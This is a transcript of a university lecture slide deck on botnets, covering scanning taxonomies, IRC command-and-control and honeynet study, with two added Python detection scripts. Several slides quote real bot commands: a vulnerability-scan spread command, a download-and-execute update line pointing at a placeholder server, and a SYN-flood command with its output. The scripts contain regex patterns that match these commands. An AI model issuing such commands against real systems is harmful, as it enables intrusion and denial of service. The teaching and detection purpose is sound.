563.7.2 Bot Nets - PowerPoint PPT Presentation

Transcript and Presenter's Notes



1
563.7.2 Bot Nets
  • Evgeni Peryshkin
  • University of Illinois
  • Fall 2007

2
What Botnets do
  • Denial of service (Tribe Flood Network, trinoo,
    Stacheldraht, Trinity)
  • Adware
  • Spyware
  • E-mail spam
  • Click fraud: generating a charge per click
    without any actual interest in the target of
    the ad's link
  • Identity theft
  • Spreading new malware: a starting base for an
    e-mail virus

papers/bots
3
Creation and use
wikipedia botnet
4
Dramatis personae
[Figure: two DDoS architectures side by side. Agent-handler attack model: Attacker(s), Handler(s), Agent(s), Victim. IRC-based attack model: Attacker(s), IRC server, Agent(s), Victim.]
Specht, Lee, 04
5
Agent Recruitment - scanning strategy
  • Random Scanning (Code Red)
      • high volume of inter-network traffic - may aid
        detection
      • no coordination - increases the likelihood of
        duplicate scans
  • Hit List
      • splits off pieces of the list to give to newly
        recruited machines
      • can be very fast and efficient - no collisions
      • a large list will cause more traffic, possibly
        aiding detection
  • Permutation Scanning
      • if an agent sees an already infected host, it
        chooses a new random starting point
      • if an agent sees a certain threshold number of
        infected hosts, it becomes dormant
  • Signpost Scanning
      • uses communication patterns or data found on
        newly infected hosts to select the next targets
      • e.g. any e-mail worm that spreads using the
        address book of the infected host
      • hard to detect based on traffic patterns
      • may be slow to spread
  • Local Subnet (Code Red II, Nimda)

UIUC 563.9.1 DoS attacks Classification/Taxonomy
6
Agent Recruitment - vulnerability scanning
  • Horizontal
      • looks for a specific port/vulnerability across
        many hosts
  • Vertical
      • looks for multiple ports/vulnerabilities on the
        same host
  • Coordinated
      • several scanners probe multiple machines on the
        same subnet for a specific vulnerability
  • Stealthy
      • any of the above, but done slowly to avoid
        detection

UIUC 563.9.1 DoS attacks Classification/Taxonomy
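As an added illustration of the scanning taxonomy on slides 5 and 6 (this code is not part of the original slides or of the cited sources), the Python below runs over constructed flow records and labels horizontal, vertical and coordinated scans, then shows why a stealthy (slow) scanner is only visible once the observation window is widened. The 10.0.0.0/8 addresses, the thresholds and the window sizes are assumptions chosen for the sample.

```python
from collections import defaultdict
from ipaddress import ip_network

# Constructed flow records (seconds since start, src, dst, dst_port); not real captures.
SAMPLE_FLOWS = [
    # horizontal: one source, one port (445), twenty hosts in twenty seconds
    *[(i, "10.0.0.5", f"10.0.1.{i}", 445) for i in range(1, 21)],
    # vertical: one source, one host, twenty ports
    *[(i, "10.0.0.6", "10.0.2.9", 1000 + i) for i in range(1, 21)],
    # coordinated: three sources split one /24 (ten hosts each), all on port 135
    *[(i, f"10.0.0.{7 + i % 3}", f"10.0.3.{i}", 135) for i in range(1, 31)],
    # stealthy: one probe every two minutes on port 22, twenty hosts over forty minutes
    *[(120 * i, "10.0.0.10", f"10.0.4.{i}", 22) for i in range(1, 21)],
    # benign: one client talking to two servers
    (5, "10.0.0.50", "10.0.5.1", 80), (6, "10.0.0.50", "10.0.5.2", 443),
]

def classify_scans(flows, window_s, host_thr=12, port_thr=12, src_thr=3):
    """Label scan sources seen in the first `window_s` seconds using the slide's
    taxonomy: horizontal (many hosts, one port), vertical (many ports, one host),
    coordinated (several sources jointly covering one /24 on one port)."""
    hosts = defaultdict(set)      # (src, dport) -> hosts probed
    ports = defaultdict(set)      # (src, dst)   -> ports probed
    net_srcs = defaultdict(set)   # (/24, dport) -> sources probing that /24
    net_hosts = defaultdict(set)  # (/24, dport) -> hosts probed in that /24
    for t, src, dst, dport in flows:
        if t >= window_s:
            continue
        net = str(ip_network(f"{dst}/24", strict=False))
        hosts[(src, dport)].add(dst)
        ports[(src, dst)].add(dport)
        net_srcs[(net, dport)].add(src)
        net_hosts[(net, dport)].add(dst)
    return {
        "horizontal": {s for (s, _), h in hosts.items() if len(h) >= host_thr},
        "vertical": {s for (s, _), p in ports.items() if len(p) >= port_thr},
        # each coordinated source stays under host_thr; only the per-subnet view shows it
        "coordinated": {k for k, s in net_srcs.items()
                        if len(s) >= src_thr and len(net_hosts[k]) >= host_thr},
    }

def stealthy_sources(flows, short_s=300, long_s=3600):
    """Sources that look harmless in a short window but scan when watched for longer."""
    fast, slow = classify_scans(flows, short_s), classify_scans(flows, long_s)
    return (slow["horizontal"] | slow["vertical"]) - (fast["horizontal"] | fast["vertical"])
```

A per-source threshold alone misses the coordinated case (each of the three scanners stays below it), which is why the subnet-level view is kept separately.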
7
Agent Recruitment - attack code propagation
  • Central Server (li0n worm)
      • all newly recruited agents contact a central
        server to get the attack code
      • single point of failure
      • can be discovered and shut down
      • high load at the central server may limit
        efficiency or enable detection
  • Back-chaining (Ramen, Morris worms)
      • attack code is downloaded from the machine that
        was used to exploit the new host
  • Autonomous (Code Red, Warhol, various e-mail
    worms)
      • attack code is downloaded concurrently with the
        exploit

UIUC 563.9.1 DoS attacks Classification/Taxonomy
8
How to study bot nets
  • Create a honeynet (interactive honeypot)
  • Data Control: contain malicious activity
  • Your node
  • Data Capture: store what the user is doing
  • Data Analysis: interpret the data captured
  • Data Collection: send the data captured to an
    organized source

papers/honeynet
9
How IRC-controlled Bot nets grow
  • Compromise a host
  • Use tftp/ftp/http/Csend to transfer itself to the
    compromised host
  • Start the binary, which connects to a hard-coded
    master server (using a dynamic DNS name)
  • Bot contacts the server; the server sends info
    about itself, including the features understood
  • Bot logs in to the master's channel with a
    password

papers/bots
10
How IRC-controlled Bot nets grow 2
  • The topic of the channel is interpreted as a
    command for the bot.
  • Example: advscan lsass 200 5 0 -r -s
  • Use 200 threads to search for the lsass
    vulnerability every 5 seconds; -s for silent, to
    reduce traffic. Adds more hosts to the botnet.
  • Example 2: ".http.update http://<server>/mugenxu/r
    Bot.exe c:\msy32awds.exe 1"
  • Download a binary file and execute it to update
    the bot.
  • Generally bots don't spread unless told to.

papers/bots
11
How IRC-controlled Bot nets grow 3
  • If requested, the bot tells the server about its
    spread.
  • The IRC server will provide the channel's user
    list. (Channel operators restrict this to save
    traffic and disguise the number of bots.)
  • Before commands are sent, the controller has to
    authenticate with the bots over the IRC channel.
  • Example: .la plmp -s
  • -s: no failure reply, to reduce traffic

papers/bots
12
How IRC-controlled Bot nets grow 4
  • The IRC server(s) is a compromised machine.
  • Flexibility of an own IRC server. Harder to trace
    to the attacker.
  • Beginners: bot-network on an original IRCd
  • 1,200 clients named rbot<> report scanning
    results. (easy to discover)
  • Top bot-net IRC servers: Unreal IRCd and
    ConferenceRoom

papers/bots
13
Different kinds of Bots - popular
  • Agobot/Phatbot/Forbot/XtremBot: tidy GPL C,
    tidy abstract design, modular and easy to add
    commands
  • SDBot/RBot/UrBot/UrXBot/...: most active, messy
    C, GPL
  • mIRC-based Bots (GT-Bots): launch the mIRC
    chat client; a HideWindow executable hides mIRC

papers/bots
14
Bot net size
  • Dutch police found a 1.5 million node botnet
  • Norwegian ISP Telenor disbanded a 10,000-node
    botnet
  • Of the 600 million computers currently on the
    internet, between 100 and 150 million were
    already part of these botnets, Mr Cerf said.
  • Generally 50k is large for a botnet

BBC
papers/bots
15
Botnet vs Botnet
  • If a machine is part of 2 botnets, packet sniffing
    allows gathering the key information of the other
    botnet. Thus it is possible to "steal" another
    botnet.
  • Stealing is easier than building one
  • Some actually "secure" the bot machines:
      • install patches
      • shut down open ports
  • DDoS to kidnap bots.

Honeynet, Dark Reading one-on-one
16
New Botnets
  • Shift from IRC to HTTP / peer-to-peer
  • Peer-to-peer more popular: not centralized; bots
    forward commands to other bots.

Dark Reading
17
Example DDoS attack
  • FOO <nickname> .scanstop
  • FOO <nickname> .ddos.syn 151.49.8.XXX 21
    200
  • FOO <-XP-18330> DDoS Flooding
    (151.49.8.XXX:21) for 200 seconds ...
    FOO <-2K-33820> DDoS Done with flood
    (2573KB/sec). FOO <-XP-86840> DDoS
    Done with flood (351KB/sec).

papers/bots
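An added example, not part of the original slides or the honeynet paper they cite, covering slides 10 to 12 and 17 from a detection angle: a small Python parser for IRC protocol lines that flags the tell-tale shapes the slides describe (a channel topic that is a bot command, dotted controller commands, bot status reports, and channels filled with template-generated nicknames). The log lines, server name, channel, nicknames, addresses and password are constructed placeholders, and the nickname regex and the `min_bots` threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed IRC lines in the shapes quoted on the slides (topic used as a command,
# controller .la/.ddos commands, bot status reports). Server, channel, nicknames,
# addresses and the password are placeholders, not values from any real botnet.
SAMPLE_IRC_LOG = """\
:irc.example.invalid 332 -XP-18330 #c0ntrol :advscan lsass 200 5 0 -r -s
:-XP-18330!u@10.0.0.11 JOIN #c0ntrol
:-2K-33820!u@10.0.0.12 JOIN #c0ntrol
:-XP-86840!u@10.0.0.13 JOIN #c0ntrol
:ctrl!u@10.0.0.9 PRIVMSG #c0ntrol :.la PASSWORD_PLACEHOLDER -s
:ctrl!u@10.0.0.9 PRIVMSG #c0ntrol :.ddos.syn 192.0.2.7 21 200
:-XP-18330!u@10.0.0.11 PRIVMSG #c0ntrol :[DDoS]: Flooding: (192.0.2.7:21) for 200 seconds.
:-2K-33820!u@10.0.0.12 PRIVMSG #c0ntrol :[DDoS]: Done with flood (2573KB/sec).
:alice!u@10.0.0.20 JOIN #linux
:alice!u@10.0.0.20 PRIVMSG #linux :anyone seen the new kernel changelog?
"""

BOT_NICK = re.compile(r"^-?\[?[A-Z0-9]{2,3}\]?[-|]\d{4,}$")  # template nicks like -XP-18330 (assumed shape)
BOT_CMD = re.compile(r"^\.?(advscan|scan\w*|ddos(\.\w+)?|http\.update|la|login)\b")
BOT_REPORT = re.compile(r"DDoS.*(Flooding|Done with flood)", re.I)

def parse_irc(line):
    """Split one IRC line into (prefix, command, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trail = line.partition(" :")
    parts = head.split()
    return prefix, parts[0], parts[1:], trail if sep else None

def analyze(log, min_bots=3):
    """Return (findings, bot_channels). findings: (channel, reason, text) per suspicious
    line; bot_channels: channels joined by at least `min_bots` template-named nicks."""
    findings, members = [], defaultdict(set)
    for raw in filter(str.strip, log.splitlines()):
        prefix, cmd, params, trail = parse_irc(raw)
        nick = prefix.split("!")[0] if prefix and "!" in prefix else None
        if cmd == "332" and len(params) > 1 and trail and BOT_CMD.match(trail):
            findings.append((params[1], "topic-is-command", trail))        # slide 10
        elif cmd == "JOIN" and params and nick and BOT_NICK.match(nick):
            members[params[0]].add(nick)                                    # slide 12
        elif cmd == "PRIVMSG" and params and trail:
            if trail.startswith(".") and BOT_CMD.match(trail):
                findings.append((params[0], "controller-command", trail))  # slides 11, 17
            elif BOT_REPORT.search(trail):
                findings.append((params[0], "bot-status-report", trail))   # slide 17
    return findings, {ch: len(n) for ch, n in members.items() if len(n) >= min_bots}
```

On a honeynet capture the same logic can be run per channel; the nickname count is the signal the slide calls "easy to discover", and it works even when operators hide the user list, because JOINs are still visible to the sensor.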
18
Lessons learned
  • Botnets are stolen frequently. Whoever gets the
    password and channel name can instruct the bots to
    upgrade to their own botnet software. (fun to
    watch bots steal bots)
  • Updates are frequent: one update killed a botnet
    (an invalid 1-character nickname).
  • Unskilled people run botnets. (username, own
    servers, own webserver for updates)
  • Often botnets are run by young males with
    surprisingly limited programming skills. ("How
    can i compile " )

papers/bots
19
Suggested Readings
  • http://honeynet.thalix.com/papers/honeynet/index.html
  • http://www.honeynet.org/papers/bots/
  • http://en.wikipedia.org/wiki/Bot_net
  • http://news.bbc.co.uk/2/hi/business/6298641.stm
  • http://www.wired.com/politics/security/magazine/15-09/ff_estonia
